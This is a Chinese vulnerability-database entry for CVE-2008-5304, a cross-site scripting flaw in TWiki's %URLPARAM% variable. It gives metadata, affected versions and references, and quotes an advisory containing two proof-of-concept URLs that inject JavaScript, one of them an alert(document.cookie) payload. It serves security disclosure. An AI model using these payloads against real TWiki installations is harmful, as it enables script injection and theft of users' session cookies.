TWiki URLPARAM变量跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116953 漏洞类型 跨站脚本
发布时间 2008-12-06 更新时间 2008-12-11
CVE编号 CVE-2008-5304 CNNVD-ID CNNVD-200812-154
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32646
https://www.securityfocus.com/bid/32669
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-154
|漏洞详情
TWiki是一款灵活易用、功能强大的企业协作平台和知识管理系统。%URLPARAM{}%TWiki变量是用于创建动态wiki内容和wiki应用的命令。如果未经正确的编码便在HTML表单字段值中使用了URLPARAM的话,就可能导致跨站脚本攻击攻击。例如:攻击者可以创建cityURL参数,用双引号括起inputvalue=""属性,然后添加其他属性。
|漏洞EXP
source: http://www.securityfocus.com/bid/32669/info

TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

An HTML form field must exist containing an input value with specifying an encoding. As an example:

<input type="text" name="city" value="%URLPARAM{ "city" }%" />

THe following examples will then demonstrate this issue:

http://example.com/twiki/view/TWiki/WebSearch?search=%27a%20onmouseover=alert(document.cookie)%20%27

http://example.com/twiki/view/TWiki/ResetPassword?username="<script language=Javascript>alert('3y3 0wn j00 TWIKI')</script>
|受影响的产品
TWiki TWiki 4.2.3 TWiki TWiki 4.2.2 TWiki TWiki 4.2.1 TWiki TWiki 4.2 TWiki TWiki 4.1.2 TWiki TWiki 4.1.1 TWiki TWiki 4.1 TWiki TWiki 4.
|参考资料

来源:twiki.org/cgi-bin
链接:http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5304
来源:XF
名称:twiki-urlparam-xss(47122)
链接:http://xforce.iss.net/xforce/xfdb/47122
来源:VUPEN
名称:ADV-2008-3381
链接:http://www.vupen.com/english/advisories/2008/3381
来源:BID
名称:32669
链接:http://www.securityfocus.com/bid/32669
来源:SECTRACK
名称:1021351
链接:http://securitytracker.com/id?1021351
来源:SECUNIA
名称:33040
链接:http://secunia.com/advisories/33040